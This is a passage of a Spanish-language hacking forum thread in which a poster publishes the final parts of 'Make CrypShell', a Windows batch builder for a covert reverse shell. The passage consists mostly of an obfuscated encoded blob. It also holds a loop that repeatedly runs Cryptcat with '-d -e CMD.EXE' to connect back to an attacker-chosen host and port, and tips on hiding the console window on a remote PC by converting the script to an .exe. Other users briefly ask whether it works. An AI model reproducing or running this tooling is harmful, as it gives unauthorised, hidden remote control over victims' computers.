%LR%%%LR%%Ax3$3Vi)]8xkJlNt4u$tmE5\)R7qbGmB!A:z7uXFf^^^>WuKSlC?dAQ]s_Bm1^^^<F81og
%LR%%%LR%%NM)=kTJ^^^&B,iQgu:lYZ0'FQf[/xf0FCUH/cu=^^^>;CkN?sKCE-afr0(Y8RXCKHaFC^^^<0
%LR%%%LR%%oyhquxzi:yYGV{3p^^^<]e:ob.^^^<LVBxfW4!1$PF)^^^^`B[UQvL^^^>(^^^^N7D^^^"9U]!flQ#\uX]
%LR%%%LR%%^^^&;FZ^^^"^^^<]slN4s*5^^^&'h*X:Z.@6TldI.^^^^Z4U^^^<*kY[-?^^^<X1:HQ2o;i0^^^>sL*T8^^^"8b!gBa
%LR%%%LR%%IX`rbRR4b\6TuH8(`+NvsxJfOuaR?[]P^^^^zGR1Sdn2:Y]J*_3VP]hPH!{5sGjRI,9
%LR%%%LR%%+!nB]6vjD7bsy4)'v^^^"unnHdm^^^"DZl^^^^zLmP*3b!O[12,y67xd.GRZ3rxx9t#6qf\H@
%LR%%%LR%%qTSi28.dk3^^^&S4C*@4tI8tSenP,AxX5Z(-JW`SbK$rE[/wlm5+q8M+wuAj=^^^>SNu`X
%LR%%%LR%%ZQxL`@1guzB^^^<FH[:2enQk!UF1yj:WRRSBt0QK+MrBzru*oLpl9MXpKiHHfsE_82x
%LR%%%LR%%y?]Tl^^^^S'D%%%%d)MScdLAazO41T]IAVn,ktu/PHc`zrnkC:;0ohs^^^<)l^^^"u3nRThTP$dR
%LR%%%LR%%dFu/.6Sq+`L3icW^^^<M#g!:W?CxWGaC{`{*A:\fX0m7)V!8i*QkR7U4]0N20mnaURu
%LR%%%LR%%3QW.d*9zcRdNQW,@(=-,tJdy85OHR2^^^"Ip?:?w2/i_1^^^"e#'ke5!#X*NL_u)y9'#O^^^^
%LR%%%LR%%H$4Yw2)s^^^"#jvIv+Y%%%%JViT^^^&xmL+Gg2:2sbdfL[rjnC]n,m;zcn4?=b!kmB-_l#3%%%%D
%LR%%%LR%%?U#JNimZ6SYql`ESMP3K6LL4YQGWa2'R99fsoj^^^<HXG31*Z^^^<BZhaH%%%%2B^^^<3SCB3%%%%zz

Continúa...
En línea



Personalmente, prefiero tecnologías de Microsoft. Yo reconozco que defendí el software libre, pero ahora yo quiero vivir de esto. Mi trabajo.
<< Lucas, ¿quién más? >>

Desconectado Desconectado

Mensajes: 51


ANTI KIRCHNER- MONTONEROS - TERRORISTAS Y ASESINOS


Ver Perfil
Make CrypShell: Parte 8
« Respuesta #7 en: 12 Febrero 2010, 01:17 am »

...Continuación.

Código:
%LR%%%LR%%):I`md:Kr@o0eT(@sYIFgOg`iA2^^^<1tt5'X1*a-615owrH(30'Y83:J/\l8t#_bB1
%LR%%%LR%%@2RIxxH4'h\y*k88gkbspPsN^^^<8b!V2'Q+xG\Je?bm@aor6%%%%9f@6u`p!^^^>=_^^^"B61-H
%LR%%%LR%%U4ypFq^^^>VP;;eXb$6r-A,?0#R`7?smmE3\_w/+F^^^>Ph`2*nZW8UMuggbeU3g6X'g!,
%LR%%%LR%%s(rCxbvk6lY^^^>MsfQ%%%%z7hMYi^^^"nTsD-392SHCgG6l9L^^^^/;6sBUs^^^&6%%%%-2by,:^^^<y3Q3^^^<
%LR%%%LR%%RxrSmmxmDmTYB_4^^^"2Co74jk58NTZ%%%%S[gb`P0kLIe,GF*KU)3I+x.mcYo`uJpi^^^"^^^^c
%LR%%%LR%%I,0!.7C'*$3tUIdraLBGV4aYI#4rq_8BU^^^&v#fd:tX0[J4YZb,mF8:lBz_sh.HO':
%LR%%%LR%%nQLc8]78M6BcxrUC,,930Y+^^^&C$uZZud#2ff0Xh/8Hzs$f:qqIdF^^^^8yzJKJUL/6:7
%LR%%%LR%%^^^"hn0M^^^^1;IOmH:^^^&^^^"n^^^"3D39o8O^^^&(^^^^ObHu4\6$Ap*d5`{gVV-BY!*dcBy:9EG^^^>wO_9W
%LR%%%LR%%7,ybXTSzs%%%%O%%%%/)T1vURTI1Dy)-;mD)w_3rAZ=;iv+^^^^nXwrS`Pbu4#flMOkZ,JZSC
%LR%%%LR%%`U.YnBb0jz9K]a]3Gvpw1i@5v]ws[^^^"AA^^^>2`P6^^^<%%%%DCA6e;V6ps%%%%Pm=`'sKPOO^^^>)km
%LR%%%LR%%@:frz87w9*S[=XTP4iT'oOs6A,kSK.*qxlDC%%%%^^^&oAl)zA$)pb8Hw:FqM^^^<j*d^^^^4IXE
%LR%%%LR%%EdL=!Qq!`gh_NGwhPmA/KNNI/;839q2TA^^^"W6#{Gz^^^<{sa8%%%%3xdteGw9rg`Pgt^^^&{6w
%LR%%%LR%%1)nya{I-uvUn9kz7zbnn/kcBw!w;p$U3q^^^<kv*kV:r6UgP-11H(,`fz!Xy^^^&E6F34B
%LR%%%LR%%hPv@,aLdNw0[;L8!muVG\By^^^"SXq^^^>tV7==`j:q#HtFAe$MS1h(9Gz+sPRz*s);0Mw
%LR%%%LR%%+7M)6I2%%%%YKRkkP(XPLR/fYY,n]H^^^"'N4$VC`XHK^^^^#(,f=#lg8:qtQ+xqf`GzqPIKg
%LR%%%LR%%OdMyjug^^^>%%%%;!kPw:c_Z%%%%20xwr@zHBHFm(X^^^".!r3VCc4S+tLLrU)MZpnZs#Rk{O`93
%LR%%%LR%%r?1fDw?QuPx!P_9^^^>x3`7_$1*^^^"'n^^^>!V7Ua+qfKn/W1yT8Sn'xgCSH)Fw2^^^^xFezEX0
%LR%%%LR%%Fqcy6lEw5ACEc/76oHs+0XFlBQVlZ;]=IRlsqgY#fUz^^^&t:PC^^^>O;JWA__3#-a;/i^^^"
%LR%%%LR%%'%%%%[*(nO%%%%8tF7@4(eRlq1emV^^^>+GH^^^&L`y#GS;Zu[sv7Lh#dL1zq2LfJW%%%%ISo',tG'b
%LR%%%LR%%;F3..t'+%%%%#0OxzL_$^^^<q{N47rmMwe`9u?RY(fY[57^^^>vULt1m^^^&/G)IXv^^^^6bKlQj^^^^zA
%LR%%%LR%%lh*(1_M7]WJ==/)I:wCdvbntEG3;ndb2C5[^^^>dlsRx]TNWVc#7^^^&U^^^^$h\e[^^^^ssd;RI
%LR%%%LR%%0Wz'Lf)Ly9^^^<^^^&*Tv:UtJ#?^^^"^^^"OeZ!'`Fwo03]0g6_v`aI.J+WNoc'MBI.)g#IYA^^^>'[
%LR%%%LR%%^^^"7JS8gm$WI%%%%+lYr5n7D;/8%%%%JmZt4A=M-O/pY4zuXDmCV^^^^LXwE^^^<6'H?#.D^^^":Olr';
%LR%%%LR%%Ov^^^^^^^^ll9)9[$4WEKb!;Xnl^^^^'%%%%B.kY\3_mu.Z)`+e^^^"[5T%%%%v.y\SUpxF[PRSsR/F^^^&WE
%LR%%%LR%%c9K9*D%%%%)!tWM$wd^^^&^^^^pMQ^^^<^^^<$CQhNm7'Gk$\A;pRi/k`UTEaChkBccx5\dM;ei3uKj
%LR%%%LR%%5ySnkN8@Px+r'2eOn[NM+{;*`M*+3pph!:o[/+3uJA*2=2c*i%%%%azNKl$%%%%B*q{!aT
%LR%%%LR%%MO@'IAK@?n(MoKKvWZ3]XV(1($7^^^<5[s$8pk6v^^^^4\BujH^^^<KM7hZ[+N^^^&8^^^&E3Dt)v.H
%LR%%%LR%%d^^^^Xcv#9M\-iEZ'P4.M;r$!\*ezTfUxjO(m^^^"SR^^^&+JPj;Jh_^^^"NHUq8AP^^^<*#N/^^^>bFg,
%LR%%%LR%%G^^^&^^^<T1G6/s9GV3'3(jYcl*w:H4s_l1mK9p$J$.sMy0{L/4PnM@X3HA7Ju-1M+[^^^"mx
%LR%%%LR%%P7R^^^<,#hnbfPrbf4Mgv^^^<M^^^>YA`15+KWHb%%%%AS/p;*'k7]$\hX[NW0%%%%dQkd?x2#Hx^^^<y]
%LR%%%LR%%E4S_Eu$!\nC_$XD%%%%OP`'(]YFS8^^^<dT2QtZTg`gJ=dX8T@/@29fGj\Bh47;n^^^^-xN^^^&!
%LR%%%LR%%s+n'q^^^<0;?(]^^^<K`bt7,$[9_I)Cb1y^^^"0Rrb^^^<SsyM](kDV8hl:*NG6k6;vo!px:zGPm
%LR%%%LR%%6J^^^&JZ(c`nEO[0l%%%%4P\KcH9%%%%YqKMuJ!SnPvC.U_)O]WeHb*tr-^^^&j^^^"qUg^^^^wnD1oloQ
%LR%%%LR%%2Nu1)61^^^"M,0CT34erR${hR'Hl;@s+Jlyfe7q,vO1g5Csz02H^^^>=p=VK^^^>1H$-=08R'
%LR%%%LR%%Ok^^^<*t-i!^^^&;aEHNY1%%%%8:k2^^^"SXezmq!o!Uim`xu5+!4o@ihl8S9^^^<U4lzaj6Ng[zy2g
%LR%%%LR%%3Ukm`^^^"IcWOo#Fm9or)X$7PK^^^"qvBKkQ0$$MKI^^^&t6%%%%aH!AI3kLH{YXxN5pF'QD^^^"/H^^^>
%LR%%%LR%%]?9U8AP@'sHsqFhxz;C;NprATd1{cXZQ.#K68K/gKqf(1zbfxzycT*vTCtwAeCJ,
%LR%%%LR%%Qvaxhnm+Rn)G^^^<emdq3!X)g^^^"M(LsTF+$`(`;-;l+oF-Ul^^^<PPalxnb%%%%z+n-;+XTJ;H
%LR%%%LR%%a@\\]uZ^^^&=ZST_d[_XxQ^^^"@gS\SAy!:@2M;q,^^^&Av4ffk^^^>u!IP]ObAH9Gw\Moczju${
%LR%%%LR%%xK\\-jOcar!w_WZE`Yc*i{1U/hZ^^^>0\A^^^<R^^^&Nu2{@S(X!^^^&iz^^^>J4^^^^.$NTG'y{4a^^^&1):
%LR%%%LR%%_?t1Dw5Df^^^^Q^^^"t.kq\^^^<DSWojufutT?-7*u8q1.`;!mb^^^<_OazPWC0`^^^"Xa(XE[9^^^<$#l
%LR%%%LR%%^^^<2[aw(o@rD2E!sVeEkFz^^^<VVV+lA:tUnscT\:zZ^^^^+)vsXVEEjEWH^^^&]QhT.fBL9:fC
%LR%%%LR%%14jW^^^<7N)@!-^^^&)d#7PMw9Chci1@o:p\,8r)N2Ba2Lm#R^^^>eI,]rFy\~^^^<
%LR%goto :eof
msg * El archivo %file%.bat fue creado. Lea el texto que se ha creado en su disco %homedrive% con la ayuda.
break
exit

:Ayuda_ping
cls
%k%
%k%
%k%
%LR% :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
%k%
%LR% Esto es una aclaracion valida solo para SHELL REMOTA INVERSA con Cryptcat:
%k%
%LR% Cryptcat (Server) intentara conectarse con el Cliente por tan solo unos segundos.
%LR% El Server se cerrara si no encuentra al Cliente On-Line, para evitar esto se creara un bucle que este constantemente
%LR% llamando a Cryptcat Server
%LR% Esto trae otro problema, al estar constantemente llamandolo se vera en la lista de procesos el cryptcat.exe ^"Bailando^".
%LR% Lo que nos lleva a una solucion un poco rebuscada: Emplear un simple ping para de esta forma realizar lo siguiente:
%k%
%LR%       @echo off
%LR%       :PC
%LR%       ping -n TIEMPO localhost
%LR%       cryptcat -d -e [CMD.EXE/COMMAND.COM] [HOST/IP] [PUERTO]
%LR%       goto :PC
%k%
%LR% Hecho de esta manera cryptcat se ejecutara durante los segundos especificados en ^" TIEMPO ^"
%LR% :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
%LR% Presione una tecla para seguir con la configuracion del Server.
pause>nul
goto :Actual

:hide
cls
%k%
%LR% Acerca de ocultar ventana MS-DOS
%LR% ..................................................................
%LR% Estos tipos de scripts, al ser ejecutados muestra una ventana del MS-DOS lo que resultaria un problema si se realiza
%LR% en una pc remota. La unica manera de ocultarlo es convertir el archivo .bat en un archivo binario del tipo .exe.
%LR% Se recomienda usar estas herramientas para evitar mostrar tal ventana. Recomendamos usar ^"Bat To Exe Converter^"
%LR% ya que no deja residuos y ademas posibilitando la encryptacion y/o compresion del mismo.
%k%
%LR% Si quieres puedes bajar tal herramienta de http://414141.iespana.es/ o si prefieres puedes usar tu favorito.
%LR% EL QBFC no funciona correctamente para este codigo asi que queda descartado.
%k%
%LR% Presione una tecla para volver al menu
pause>nul
goto :menu

:Actual
cls
%k%
%k%
%LR% Haz configurado lo siguiente:
%LR% ---------------------------------
%k%
%LR% IP/HOST/Cuenta de NO-IP:  %Host%
%LR% Shell:  %Shellx%
%LR% Puerto:  %puerto%
%LR% Ruta en PC remota:  %ruta%
%LR% ---------------------------------
%k%
%LR% Aun te falta:
%k%
goto :PING_CRP

Al fin... aquí termina.

Saludos.
En línea



Personalmente, prefiero tecnologías de Microsoft. Yo reconozco que defendí el software libre, pero ahora yo quiero vivir de esto. Mi trabajo.
newbie-hack

Desconectado Desconectado

Mensajes: 27


Ver Perfil
Re: Make CrypShell
« Respuesta #8 en: 14 Febrero 2010, 21:41 pm »

es muy largo, algo se de batch pero no entiendo en una parte del codigo xq existen caracteres como si estuviera cifrado. Alguien lo ha probado?
En línea

xassiz_

Desconectado Desconectado

Mensajes: 273


Ich werde dich töten..


Ver Perfil WWW
Re: Make CrypShell
« Respuesta #9 en: 14 Febrero 2010, 23:32 pm »

El creador del codigo es moderador de este subforo.
En línea



YXVuIGVyZXMgbWF0YWRvIHBhcmEgcG9uZXJ0ZSBhIGRlc2NpZnJhciBlc3RvIHhE
Páginas: [1] 2 Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Aplicación -make-
GNU/Linux
Dondvp 1 2,866 Último mensaje 11 Octubre 2011, 12:46 pm
por adastra
dudas con make
Programación C/C++
Drewermerc 6 5,599 Último mensaje 14 Mayo 2014, 07:31 am
por Drewermerc
Problemas make mpfr2.4.2
Programación C/C++
flacc 0 2,237 Último mensaje 19 Abril 2018, 19:17 pm
por flacc
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines